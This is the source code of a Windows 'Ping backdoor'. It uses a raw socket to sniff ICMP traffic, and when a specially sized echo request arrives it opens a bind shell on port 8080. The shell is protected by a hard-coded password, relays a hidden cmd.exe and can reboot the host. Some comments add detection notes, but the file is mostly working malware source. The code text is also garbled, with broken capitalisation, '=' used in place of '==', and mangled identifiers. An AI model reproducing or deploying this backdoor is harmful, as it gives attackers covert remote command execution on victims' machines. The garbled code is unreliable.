Pingback backdoor (source code)


# Include <stdio. h>
# Include <stdlib. h>
# Include <winsock2.h>
// # Include <ws2tcpip. h>
# Include <mstcpip. h>

# Define ICMP_Echo 8 // ICMP type 8 = echo request; decode_sniffer() triggers on exactly this type
# Define ICMP_ECHOREPLY 0 // ICMP type 0 = echo reply (only referenced in commented-out code)
# Define sniffer_icmp_size 101 // ICMP payload size the sniffer matches on: it only acts when a received datagram is exactly this + 28 bytes
# Define bind_port 8080 // TCP port the shell listener binds to; an unexpected listener here is a host-side indicator
# Define max_packet 10000 // size of the recvfrom() buffer allocated in sniffer()
# Define def_password "givemeshell! "// Hard-coded password checked by bindshell(); present verbatim in the binary, so it doubles as a static signature
# Define xmalloc (s) heapalloc (getprocessheap (), heap_zero_memory, (s )) // zero-initialised process-heap allocation (no failure check at the call site)

// IPv4 header layout (20 bytes, no options). The raw socket in sniffer() delivers
// the full IP datagram, so decode_sniffer() skips sizeof(ipheader) to reach ICMP.
Typedef struct iphdr
{
Unsigned char h_verlen; // 4-bit version + 4-bit header length (1 byte)
Unsigned char TOS; // 8-bit type of service (1 byte)
Unsigned short total_len; // 16-bit total length in bytes (2 bytes)
Unsigned short ident; // 16-bit identification (2 bytes)
Unsigned short frag_and_flags; // 3-bit flags + 13-bit fragment offset (2 bytes)
Unsigned char TTL; // 8-bit time to live (1 byte)
Unsigned char proto; // 8-bit protocol: TCP, UDP, ICMP, ... (1 byte)
Unsigned short checksum; // 16-bit header checksum (2 bytes)
Unsigned int sourceip; // 32-bit source address (4 bytes)
Unsigned int destip; // 32-bit destination address (4 bytes)
} Ipheader; // total IP header length: 20 bytes

// ICMP header layout (8 bytes). Only I_type is inspected by decode_sniffer();
// the checksum is never verified, so any datagram with type 8 is accepted.
Typedef struct _ ihdr
{
Unsigned char I _type; // 8-bit message type (1 byte)
Unsigned char I _code; // 8-bit code (1 byte)
Unsigned short I _cksum; // 16-bit checksum (2 bytes)
Unsigned short I _id; // 16-bit identifier, conventionally the sender's process id (2 bytes)
Unsigned short I _seq; // 16-bit sequence number (2 bytes)
} Icmpheader; // total ICMP header length: 8 bytes

Int sniffer (); // raw-socket receive loop; returns -1 on socket error, otherwise never returns
Void decode_sniffer (char *, Int, struct sockaddr_in *); // inspects one captured datagram and calls bindshell() on an ICMP echo request
Int bindshell (); // TCP listener on bind_port that relays a hidden cmd.exe; returns 1 on normal close, -1 on accept/password failure

// Argument buffers for the WSAIoctl(SIO_RCVALL, ...) call in sniffer().
DWORD dwbufferlen [10]; // output buffer (contents unused)
DWORD dwbufferinlen = 1; // input value 1 = enable receive-all mode on the bound interface
DWORD dwbytesreturned = 0; // bytes written to the output buffer (unused)
Handle bindthread; // only referenced in commented-out code; bindshell() is called synchronously instead

// Entry point: initialise Winsock 2.2, then hand control to sniffer(), which loops
// forever and only returns on a socket error. No arguments are used. Exit code is
// -1 if WSAStartup fails, 0 otherwise.
Int main (INT argc, char ** argv)
{
Wsadata;
Int retval;

// Winsock initialisation; the process cannot continue without it
If (retval = wsastartup (makeword (2, 2), & wsadata ))! = 0)
{
Printf ("wsastartup failed: % d/N", retval );
Exit (-1 );
}

// Blocks here for the lifetime of the process (see sniffer())
Sniffer ();

// Reached only after a sniffer() error
Wsacleanup ();
Return 0;
}

// Raw-socket capture loop. Opens a SOCK_RAW/IPPROTO_IP socket bound to the host's
// first address, switches it to receive-all mode (SIO_RCVALL) so every inbound IP
// datagram on that interface is delivered, and forwards datagrams whose size is
// exactly sniffer_icmp_size + 28 to decode_sniffer(). Returns -1 on a socket or
// name-lookup error; otherwise never returns. The recvbuf allocation is never freed.
// Detection note: a raw IP socket with SIO_RCVALL enabled is an unusual capability
// for a user process and is a good host-side indicator on its own.
Int sniffer ()
{
Int packsize = sniffer_icmp_size;
Socket socksniffer;
Struct sockaddr_in DEST, from;
Struct hostent * HP;
Int sread;
Int fromlen = sizeof (from );
Unsigned char localname [256];
Char * recvbuf;

// Raw IP socket: delivers whole datagrams including the IP header
If (socksniffer = wsasocket (af_inet, sock_raw, ipproto_ip, null, 0, wsa_flag_overlapped) = invalid_socket)
{
Printf ("wsasocket () failed: % d/N", wsagetlasterror ());
Return-1;
}

// Resolve the local host name to pick the interface address to bind
Gethostname (char *) localname, sizeof (localname)-1 );
If (HP = gethostbyname (char *) localname) = NULL)
{
Return-1;
}
Memset (& DEST, 0, sizeof (DEST ));
Memcpy (& DeST. sin_addr.s_addr, HP-> h_addr_list [0], HP-> h_length); // first resolved address (h_addr_list[0])
DeST. sin_family = af_inet;
DeST. sin_port = htons (8000); // port value is arbitrary for a raw socket
// Bind to the chosen interface address (return value unchecked)
BIND (socksniffer, (psockaddr) & DEST, sizeof (DEST ));

// Enable receive-all mode on the bound interface (dwbufferinlen == 1). NOTE(review):
// on Windows this is normally only honoured for an elevated process — confirm.
Wsaioctl (socksniffer, sio_rcvall, & dwbufferinlen, sizeof (dwbufferinlen), & dwbufferlen,

Sizeof (dwbufferlen), & dwbytesreturned, null, null );

// Receive buffer of max_packet bytes from the process heap (allocation result unchecked)
Recvbuf = (char *) xmalloc (max_packet );

Printf ("sniffer OK! ");

// Capture loop: runs for the lifetime of the process
While (1)
{
// Blocking read of one datagram
Sread = recvfrom (socksniffer, recvbuf, max_packet, 0, (struct sockaddr *) & from, & fromlen );

// Receive error: timeouts are retried, anything else ends the loop
If (sread = socket_error | sread <0)
{
If (wsagetlasterror () = wsaetimedout)
{
Continue;
}
Printf ("recvfrom failed: % d/N", wsagetlasterror ());
Return-1;
}
Else
// If (sread> = 28)
// Only datagrams of exactly packsize + 28 bytes (20-byte IP header + 8-byte ICMP
// header + sniffer_icmp_size payload) are inspected; everything else is dropped silently.
If (sread = packsize + 28)
{
// Pass the datagram on; the length argument excludes the 28 header bytes
Decode_sniffer (recvbuf, sread-28, & from );
}
}
Return 1;
}

// Inspects one captured datagram. Buf points at the IP header, bytes is the payload
// length after the 28 header bytes (unused here), From is the sender address (unused).
// If the ICMP type is echo request (8) it calls bindshell() synchronously, so the
// capture loop is suspended until that session ends. No sender check, no payload
// check and no checksum verification is done: any ping of the matching size from
// any source opens the listener.
Void decode_sniffer (char * Buf, int bytes, struct sockaddr_in * From)
{
Icmpheader * icmphdr;

// ICMP header follows the fixed 20-byte IP header (no IP options are handled)
Icmphdr = (icmpheader *) (BUF + sizeof (ipheader ));

/*
Printf ("/R/n % d bytes from % s,", bytes, inet_ntoa (from-> sin_addr); // retrieve the received data
Printf ("icmp_type: % d", icmphdr-> I _type); // check type
Printf ("icmp_seq: % d/R/N", icmphdr-> I _seq); // retrieve the serial number

//? Outbound data segment BUF + 28 + I
For (INT I = 0; I <bytes-1; I ++)
{
Printf ("% C", * (BUF + sizeof (ipheader) + sizeof (icmpheader) + I ));
}
*/

// If (icmphdr-> I _type = ICMP_Echo | icmphdr-> I _type = ICMP_ECHOREPLY)
// Trigger condition: ICMP echo request only
If (icmphdr-> I _type = ICMP_Echo)
{
// Blocking call; returns when the shell session closes or the password check fails
Bindshell ();

// DWORD bid;
// Bindthread = createthread (null, 0, bindshell, 0, 0, & bid );
}
Else
Printf ("/R/n get other packets! ");

Return;
}

// Single-session bind shell. Listens on TCP bind_port, accepts one client, prompts
// for a password and checks it with strstr() against def_password (a substring match),
// then starts a hidden cmd.exe with stdin/stdout/stderr attached to two anonymous
// pipes and relays bytes between the client socket and those pipes until the client
// disconnects or sends a line beginning with "EXIT" or "REBOOT". Returns 1 on normal
// close, -1 if accept() fails or the password does not match. Both sockets get a 60 s
// receive timeout. The cmd.exe process is not terminated on return.
// Detection note: an inbound listener on bind_port, the fixed banner/prompt strings
// below, and a child cmd.exe with a hidden window and redirected standard handles are
// the observable artefacts of this function.
Int bindshell (){
Int bport = bind_port;
Socket bindserver, getclient;
Struct sockaddr_in addrserver, addrclient;
Char buff [4096];
Char * messages = "/R/n ====================== Ping backdoor v0.1 ==== =================================/R/n =========== code by lion.

Welcome to http: // www.cnhonker.net ========/R/N ";
Char * getpass = "/R/n your password :";
Char * passok = "/R/n OK! Please enter :";
Char * nothispass = "/R/n sorry, your password not right./R/N ";
Char * exitok = "/R/n exit OK! /R/N ";
Char * rebootok = "/R/n reboot now! /R/N ";

// Listening socket (return value unchecked)
Bindserver = socket (af_inet, sock_stream, ipproto_tcp );

// Bind to all interfaces on bport
Addrserver. sin_family = af_inet;
Addrserver. sin_port = htons (bport );
Addrserver. sin_addr.s_addr = addr_any;

// 60 s receive timeout on the listener
Int timeout = 60000;
Setsockopt (bindserver, sol_socket, so_rcvtimeo, (char *) & timeout, sizeof (timeout ));

// Allow rebinding the port immediately after a previous session
Uint breuser = 1;
Setsockopt (bindserver, sol_socket, so_reuseaddr, (char *) & breuser, sizeof (breuser ));

// bind()/listen() results are not checked
BIND (bindserver, (struct sockaddr *) & addrserver, sizeof (addrserver ));
Listen (bindserver, 2 );

Printf ("/R/n bind port on % d OK.", bport );

// Length of the client address structure for accept()
Int ilen = sizeof (addrclient );

// Blocks until one client connects
Getclient = accept (bindserver, (struct sockaddr *) & addrclient, & ilen );

If (getclient! = Invalid_socket)
{
// 60 s receive timeout on the accepted connection
Int itimeout = 60000;
Setsockopt (getclient, sol_socket, so_rcvtimeo, (char *) & itimeout, sizeof (itimeout ));
}
Else
Return-1;

// Banner
Send (getclient, messages, strlen (messages), 0 );

// Password prompt
Send (getclient, getpass, strlen (getpass), 0 );

// Read the client's reply into buff
Recv (getclient, buff, 0 );

// Substring match against the hard-coded password
If (! (Strstr (buff, def_password )))
{
// Wrong password: report, close both sockets and return
Send (getclient, nothispass, strlen (nothispass), 0 );
Printf ("/R/n password not right! ");
Closesocket (getclient );
Closesocket (bindserver );
Return-1;
}

// Password accepted
Send (getclient, passok, strlen (passok), 0 );

// Two anonymous pipes: pipe1 carries cmd.exe output, pipe2 carries client input
Handle hreadpipe1, hwritepipe1, hreadpipe2, hwritepipe2;
Unsigned long lbytesread;

Security_attributes SA;

// Inheritable handles so the child process can use the pipe ends
SA. nlength = 12;
SA. lpsecuritydescriptor = 0;
SA. binherithandle = true;

Createpipe (& hreadpipe1, & hwritepipe1, & SA, 0 );
Createpipe (& hreadpipe2, & hwritepipe2, & SA, 0 );

Startupinfo siinfo;
Char character line [] = "cmd.exe ";
Process_information processinformation;

// Hidden window, standard handles redirected to the pipes
Zeromemory (& siinfo, sizeof (siinfo ));
Siinfo. dwflags = startf_useshowwindow | startf_usestdhandles;
Siinfo. wshowwindow = sw_hide;
Siinfo. hstdinput = hreadpipe2; // cmd.exe reads what the client sent (written to pipe2 below)
Siinfo. hstdoutput = siinfo. hstderror = hwritepipe1; // cmd.exe output and errors go to pipe1

Printf ("/R/n pipe create OK! ");

// Start cmd.exe as a child with the redirected handles (result unchecked)
Int bread = CreateProcess (null, cmdline, null, & siinfo, & processinformation );

// Relay loop: alternately drain cmd.exe output to the client and forward client input to cmd.exe
While (1)
{
// Non-blocking check for pending output in pipe1 (up to 1024 bytes)
Int ret = peeknamedpipe (hreadpipe1, buff, 1024, & lbytesread );

If (lbytesread)
{
// Consume the pending output
Ret = readfile (hreadpipe1, buff, lbytesread, & lbytesread, 0 );
If (! RET) break;

// Forward it to the client
Ret = Send (getclient, buff, lbytesread, 0 );
If (Ret <= 0) break;
}
Else
{
// No pending output: wait for client input (subject to the 60 s timeout)
Lbytesread = Recv (getclient, buff, 1024,0 );
If (lbytesread <= 0) break;

// Forward the client's bytes to cmd.exe's stdin
Ret = writefile (hwritepipe2, buff, lbytesread, & lbytesread, 0 );

// Client-side control words are matched on the raw bytes just received
If (lbytesread> 4 & buff [0] = 'E' & buff [1] = 'X' & buff [2] = 'I '&& buff [3] = 'T ')
{
// "EXIT": close the session
Send (getclient, exitok, strlen (exitok), 0 );
Closesocket (getclient );
Closesocket (bindserver );
Return 1;
}
Else if (lbytesread> 6 & buff [0] = 'R' & buff [1] = 'E' & buff [2] = 'B '& & buff [3] = 'O '&&

Buff [1] = 'O' & buff [2] = 'T ')
{
// "REBOOT": close the session and reboot the host
Send (getclient, rebootok, strlen (rebootok), 0 );
Closesocket (getclient );
Closesocket (bindserver );
Exitwindowsex (ewx_reboot, null );
Return 1;
}

If (! RET) break;
}
}

// Pipe error or client disconnect: close both sockets
Closesocket (getclient );
Closesocket (bindserver );
Return 1;
}
